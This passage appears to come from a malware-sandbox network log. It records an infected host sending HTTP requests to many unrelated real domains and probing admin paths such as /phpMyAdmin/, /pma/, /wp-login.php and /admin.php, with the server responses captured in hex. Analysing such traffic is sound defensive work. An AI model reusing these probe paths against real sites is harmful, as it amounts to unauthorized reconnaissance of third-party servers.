Nov 30, 2023 11:22:41.683871031 CET	926	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:41 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/PhpMyAdmin/ X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_WoI+c83X3BLpVsCcBay0VW2NjRIdKsGzNtEZmkHp2pGwecGWdlSiOOihtyprpIH+CE23OwwDftu1iQXkSaZq7w Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.163;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.4	62413	192.99.158.243	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.611737967 CET	220	OUT	GET /pma/ HTTP/1.1 Host: gr.2mail.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:41.726356983 CET	564	IN	HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: http://ww42.2mail.com Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.2 X-AspNet-Version: 4.0.30319 Set-Cookie: _dhc.651070=228ce439-6e73-48c3-a896-03dc4be101c2; path=/ X-Powered-By: ASP.NET Date: Thu, 30 Nov 2023 10:20:14 GMT Connection: close Content-Length: 138 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 34 32 2e 32 6d 61 69 6c 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://ww42.2mail.com">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.4	62295	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.612413883 CET	221	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:41.791877985 CET	442	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:41 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/phpMyAdmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.4	62412	194.63.248.47	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.694091082 CET	222	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: z-a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:41.894577980 CET	534	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:41 GMT Server: Apache/2.4.25 (Debian) Location: https://z-a.com/phpMyAdmin/ Content-Length: 284 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 7a 2d 61 2e 63 6f 6d 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 7a 2d 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://z-a.com/phpMyAdmin/">here</a>.</p><hr><address>Apache/2.4.25 (Debian) Server at z-a.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.4	62475	68.183.34.12	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.697040081 CET	217	OUT	GET /pma/ HTTP/1.1 Host: hul.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:41.874367952 CET	233	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:41 GMT Server: Apache/2.4.57 (Ubuntu) Location: http://hul.co.uk/ Content-Length: 0 Content-Type: text/html; charset=UTF-8
Nov 30, 2023 11:22:41.921293020 CET	213	OUT	GET / HTTP/1.1 Host: hul.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:42.102081060 CET	1340	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:42 GMT Server: Apache/2.4.57 (Ubuntu) Location: http://www.hul.co.uk Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 30 Nov 2023 10:22:42 +0000 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=3juku14mbnnvmr7i9hb2cdjka7; path=/ Content-Length: 4111 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 21 2d 2d 20 79 73 6d 2f 20 2d 2d 3e 0a 3c 21 2d 2d 20 68 75 6c 2e 63 6f 2e 75 6b 20 2d 2d 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 57 65 6c 63 6f 6d 65 20 74 6f 20 48 55 4c 2e 63 6f 2e 75 6b 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 69 6d 61 67 65 74 6f 6f 6c 62 61 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 73 74 79 6c 65 73 2f 62 61 73 65 2e 63 73 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 68 75 6c 2e 63 6f 2e 75 6b 20 7c 20 53 65 61 72 63 68 20 66 6f 72 20 65 76 65 72 79 74 68 69 6e 67 20 68 75 6c 20 72 65 6c 61 74 65 64 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 2d 31 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 3c 21 2d 2d 0a 09 09 66 75 6e 63 74 69 6f 6e 20 61 64 64 5f 73 65 61 72 63 68 5f 74 72 65 6e 64 73 28 6b 65 79 77 6f 72 64 73 29 0a 09 09 7b 09 0a 09 09 09 76 61 72 20 77 69 64 74 68 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6d 61 69 6e 5f 63 6f 6e 74 65 6e 74 27 29 2e 6f 66 66 73 65 74 57 69 64 74 68 3b 0a 09 09 09 76 61 72 20 74 72 65 6e 64 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 73 65 61 72 63 68 5f 74 72 65 6e 64 73 5f 66 72 61 6d 65 27 29 3b 0a 09 09 09 76 61 72 20 73 63 72 69 70 74 5f 73 72 63 20 3d 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 74 72 65 6e 64 73 2f 66 65 74 63 68 43 6f 6d 70 6f 6e 65 6e 74 3f 68 6c 5c 37 35 65 6e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html>... ysm/ -->... hul.co.uk --><head><title>Welcome to HUL.co.uk</title><meta http-equiv="imagetoolbar" content="no" /><link rel="stylesheet" type="text/css" href="styles/base.css" /><meta name="description" lang="en" content="hul.co.uk \| Search for everything hul related" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Expires" content="-1" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><script type="text/javascript">...function add_search_trends(keywords){var width = document.getElementById('main_content').offsetWidth;var trends = document.getElementById('search_trends_frame');var script_src = "http://www.google.com/trends/fetchComponent?hl\75en
Nov 30, 2023 11:22:42.102098942 CET	1340	IN	Data Raw: 2d 47 42 5c 34 36 71 5c 37 35 22 2b 6b 65 79 77 6f 72 64 73 2b 22 5c 34 36 67 65 6f 5c 37 35 47 42 5c 34 36 63 6d 70 74 5c 37 35 71 5c 34 36 63 6f 6e 74 65 6e 74 5c 30 37 35 31 5c 34 36 63 69 64 5c 37 35 54 49 4d 45 53 45 52 49 45 53 5f 47 52 41 Data Ascii: -GB\46q\75"+keywords+"\46geo\75GB\46cmpt\75q\46content\0751\46cid\75TIMESERIES_GRAPH_0\46export\0755\46w\075"+width+"\46h\075360";trends.setAttribute('src', script_src);trends.setAttribute('width',width);return false;}--></
Nov 30, 2023 11:22:42.102108002 CET	1340	IN	Data Raw: 65 20 66 6f 72 20 73 61 6c 65 20 6f 72 20 6c 65 61 73 65 3c 2f 61 3e 3c 2f 68 32 3e 0a 09 09 09 09 09 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 69 6e 74 65 72 65 73 74 65 64 20 69 6e 20 48 55 4c 2e 63 6f 2e 75 6b 2c 20 70 6c 65 61 73 65 20 63 6c Data Ascii: e for sale or lease</a></h2><p>If you are interested in HUL.co.uk, please click <a href="/buy-this-domain.php">here</a> to find out more</p></div><div style="clear: both;"></div><div style="clear: both;"></div>
Nov 30, 2023 11:22:42.102124929 CET	735	IN	Data Raw: 3d 22 73 75 62 6d 69 74 22 20 76 61 6c 75 65 3d 22 53 75 62 6d 69 74 20 26 72 61 71 75 6f 3b 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 09 09 0a 09 3c 2f Data Ascii: ="submit" value="Submit »"></div></div><div class="clear"></div></fieldset></form></div><br/></div> ... notice-beige --></div> ... content --></div> ... bd --><div class="clear"></div><di

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.4	62699	216.37.42.12	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.751283884 CET	225	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: noweco.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:41.888078928 CET	495	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 30 Nov 2023 10:22:41 GMT Server: Apache Location: https://www.noweco.com/PhpMyAdmin/ Content-Length: 242 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 6f 77 65 63 6f 2e 63 6f 6d 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.noweco.com/PhpMyAdmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.4	62732	192.99.158.243	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.760730028 CET	228	OUT	GET /wp-login.php HTTP/1.1 Host: gr.2mail.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:41.874830008 CET	564	IN	HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: http://ww42.2mail.com Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.2 X-AspNet-Version: 4.0.30319 Set-Cookie: _dhc.651070=853129b2-abbc-49d2-936e-93e4e6ec17aa; path=/ X-Powered-By: ASP.NET Date: Thu, 30 Nov 2023 10:20:14 GMT Connection: close Content-Length: 138 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 34 32 2e 32 6d 61 69 6c 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://ww42.2mail.com">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.4	62721	3.64.163.50	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.827297926 CET	227	OUT	GET /admin.php HTTP/1.1 Host: gcann.cr.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.4	62722	3.64.163.50	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.829469919 CET	221	OUT	GET /admin.php HTTP/1.1 Host: gbya.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.4	62731	68.183.34.12	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.830534935 CET	217	OUT	GET / HTTP/1.1 Host: www.hul.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:42.015626907 CET	1340	IN	HTTP/1.1 200 OK Date: Thu, 30 Nov 2023 10:22:41 GMT Server: Apache/2.4.57 (Ubuntu) Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 30 Nov 2023 10:22:41 +0000 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=jvifd8b77vplo6tga4kqljm0c7; path=/ Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 1625 Content-Type: text/html; charset=UTF-8 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 57 5b 53 db 38 14 7e 4e 7e 85 ea 87 02 d3 3a 26 b0 bd 0c 24 d9 6d 21 a5 cc 50 ca 94 30 dd 9d e9 8c 47 b6 e5 58 45 96 8c 24 13 32 db fd ef 7b 74 b1 e3 00 29 30 6d a2 cb b9 7c e7 e8 dc 32 7a 71 fc f5 68 f6 cf c5 14 15 ba 64 e8 e2 ea e3 d9 e9 11 0a c2 28 fa be 7f 14 45 c7 b3 63 f4 f7 e7 d9 97 33 34 1c ec a2 4b 2d 69 aa a3 68 7a 1e a0 a0 d0 ba 3a 88 a2 c5 62 31 58 ec 0f 84 9c 47 b3 6f d1 9d 91 32 34 6c 7e 19 2a cb 33 c8 74 16 4c fa 23 73 36 e9 f7 47 2f c2 10 2d 55 19 a1 30 9c b8 5d 51 b3 41 2a 06 f5 b5 3d 02 4a 82 b3 49 bf 37 d2 54 33 32 f9 4e 58 2a 4a 82 b4 40 9f af ce 1c e1 28 72 77 40 54 12 8d 91 01 14 92 9b 9a de 8e 03 5a e2 39 d1 42 b0 04 cb 00 a5 82 6b c2 f5 38 e0 22 40 91 61 60 94 5f 23 49 d8 38 50 7a c9 88 2a 08 d1 01 d2 cb 8a 8c 03 4d ee 74 94 2a 15 a0 42 92 bc a1 88 12 ac c8 c0 1e 47 ad 4a 8e 4b 60 c8 88 4a 25 ad 34 15 3c 40 0c f3 f9 38 20 bc a3 75 65 da 2f 74 49 b0 4c 0b 94 0b 89 c8 2d 91 4b 5d 50 3e 37 c6 1b 34 58 93 ac 2b be 6b d1 85 c4 f3 12 af d9 12 a6 38 2d c8 26 86 e9 5d 45 25 51 1d 8e 70 b8 89 f6 c8 91 84 33 70 40 87 c1 7a c2 3c d9 21 4a 0b 2c 15 d1 e3 ab d9 a7 f0 bd 17 e3 ac ee 7a ed 27 be c5 ee 14 1e bb d7 33 0f 0b 5f 79 cd 53 e3 1c 84 b3 2c 56 d6 01 b1 96 84 67 6a fb 9a 2c 17 42 66 6a 07 c8 fe ed c1 47 ef 16 4b b4 a0 99 2e d0 18 65 22 ad 4b 40 32 80 b7 9c 32 62 96 1f 97 a7 d9 f6 56 89 29 8f 3d cc ad 9d 81 c8 73 c0 f6 dd 70 1d 36 32 9c 82 df 09 59 43 12 e7 12 de 72 6b a7 e5 77 66 c4 4a a6 20 a3 1b ec 73 21 e6 0c 22 41 94 91 63 8d 72 a2 d3 e2 48 94 95 e0 20 fc cf 82 fd 78 f7 86 f0 f0 e4 e3 8f 3f de de c0 3a 78 d5 98 f9 2a 80 a3 39 11 70 68 6f d3 b2 d2 b0 be 31 4b 67 cd 8f dd 77 6f 86 66 4b 33 b8 98 9d 7e 99 5e 4e bf 9d 4e 2f e3 93 6f 1f 2e 3e c7 bb 70 45 ee 2a 21 2d e1 1b d8 2d cc 22 78 65 5d 66 c5 17 e6 60 ff ed 6e 60 4d 71 10 07 e0 9e 0f 1a 32 31 a9 35 01 cb 65 ba f5 ba 63 e1 ce 66 52 2b 77 eb b5 fd 72 64 92 e8 5a 72 94 63 a6 88 39 f8 0f fe 9b 94 ed 8d 22 27 f1 e9 d0 e8 ad 11 f7 47 91 4b f6 51 22 b2 25 12 fc 4c e0 0c b2 aa 79 37 35 1c dc 0c 72 d8 a9 ed 9d 60 32 ca e8 2d a2 70 bf 90 b8 aa 88 34 81 66 cf 52 86 95 82 64 cb 5c e8 35 64 73 2a 71 9e 93 38 c1 9c 3b 6a b8 2c 86 93 11 f6 e9 1d 05 93 4e 49 c1 93 97 3c 51 d5 61 f7 33 59 02 c2 a1 e3 6c b8 ba 01 e1 34 38 09 00 90 96 73 04 4e f5 45 48 45 0d 02 26 e6 02 88 f3 00 61 06 c9 75 b2 c6 b6 86 d5 50 9a 1c 33 70 8c 2d 11 18 b3 66 14 c7 b7 b1 a9 6c 16 53 af 73 61 ea 9a 6a 8f db 2b ef 1b 73 1b 53 4d ca 2e ca c8 c3 34 32 29 cf c8 5d 9c d6 52 da 84 69 b1 16 50 7b 1d 20 8f 64 ed 6f 93 8a c6 57 49 bd 0c a1 Data Ascii: W[S8~N~:&$m!P0GXE$2{t)0m\|2zqhd(Ec34K-ihz:b1XGo24l~3tL#s6G/-U0]QA=JI7T32NXJ@(rw@TZ9Bk8"@a`_#I8PzMtBGJK`J%4<@8 ue/tIL-K]P>74X+k8-&]E%Qp3p@z<!J,z'3_yS,Vgj,BfjGK.e"K@22bV)=sp62YCrkwfJ s!"AcrH x?:x9pho1KgwofK3~^NN/o.>pE!--"xe]f`n`Mq215ecfR+wrdZrc9"'GKQ"%Ly75r`2-p4fRd\5dsq8;j,NI<Qa3Yl48sNEHE&auP3p-flSsaj+sSM.42)]RiP{ doWI
Nov 30, 2023 11:22:42.015641928 CET	833	IN	Data Raw: ce a9 30 13 26 71 07 55 51 6d 02 70 9f 74 05 01 6e 90 b9 41 ee a6 71 cf 23 88 56 ee f2 0b ff dd 6f a2 d2 6a 7d 90 d1 21 e6 98 2d 35 4d 95 cd ed 1a 6a 03 00 f8 a9 82 8d 05 6e 15 c3 4f 95 42 84 e2 1a a7 29 98 71 f5 21 1c be df df 1b be 7b 0b d5 f8 Data Ascii: 0&qUQmptnAq#Voj}!-5MjnOB)q!{.&sbqm\808&ron#CI9b>;'rzlzpmu&:jrkA#FhzV(D-f\!5*9Zhc<

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.4	62747	3.64.163.50	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.842624903 CET	214	OUT	GET /pma/ HTTP/1.1 Host: gmo.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:42.030678988 CET	339	IN	HTTP/1.1 410 Gone Server: openresty Date: Thu, 30 Nov 2023 10:22:41 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 32 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 67 6d 6f 2e 75 6b 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>42 <meta http-equiv='refresh' content='0; url=http://gmo.uk/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.4	62996	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.857096910 CET	220	OUT	GET /admin.php HTTP/1.1 Host: a6a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:41.960869074 CET	419	IN	HTTP/1.1 404 Not Found Date: Thu, 30 Nov 2023 10:22:41 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-123-181.ec2.internal X-Request-Id: c178c8ba-afae-4204-8e76-dadcee4d9b29 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.4	62997	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.857112885 CET	216	OUT	GET /admin HTTP/1.1 Host: m7l.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
